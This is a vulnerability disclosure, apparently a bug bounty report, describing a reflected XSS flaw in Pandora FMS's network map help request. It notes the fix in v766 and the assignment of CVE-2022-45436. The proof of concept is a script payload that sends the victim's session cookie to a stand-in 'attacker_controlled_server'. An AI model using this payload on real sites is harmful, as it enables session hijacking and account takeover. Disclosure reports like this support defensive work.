Reflected Cross Site Scripting leading to session hijacking in pandorafms/pandorafms
Nov 1st 2022
XSS (Cross-Site Scripting) vulnerabilities arise when untrusted data gets interpreted as code in a web context. XSS attacks effectively make the attacker logged in as the target user, with the nasty addition of tricking the user into giving some information (such as their password) to the attacker, perhaps downloading and executing malware on the user's workstation.
Steps to reproduce:
- Get the request by hitting the help button in the "http://localhost:8080/pandora_console/index.php?sec=network&sec2=operation/agentes/pandora_networkmap". (As shown in POC).
- Add the payload in the "b" parameter in the request.
- Copy the URL with payload in it, and it to the user logged in as admin.
- When Admin user try to visit the malicious link payload will gets executed.
- Session Cookie will be send to the our controlled server.
- Once we gets the cookie we can log in as Admin using the same.
Proof of Concept
<script>alert(document.cookie);var i=new Image;i.src="http://attacker_controlled_server/?"+document.cookie;</script>
Attacker can get the any user session cookie using this vulnerability, and can be logged into that users session. If Attacker gets the session of admin user he/she will have all the access of the application, and he/she can even delete the users.
- If you display untrusted HTML content on your website, purify it first and contain it in a sandboxed frame.
@admin can we have a CVE for this issue ?
Pandora is a CNA and they usually assign CVEs before public disclosure if the report portrays a valid vulnerability :)
Fixed in v766 --> CVE-2022-45436